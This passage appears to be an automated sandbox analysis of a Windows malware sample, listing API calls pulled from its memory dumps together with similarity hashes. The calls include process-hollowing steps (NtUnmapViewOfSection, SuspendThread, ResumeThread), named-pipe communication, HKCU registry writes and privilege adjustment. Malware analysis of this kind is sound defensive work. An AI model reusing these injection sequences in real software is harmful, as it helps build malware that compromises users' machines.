    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
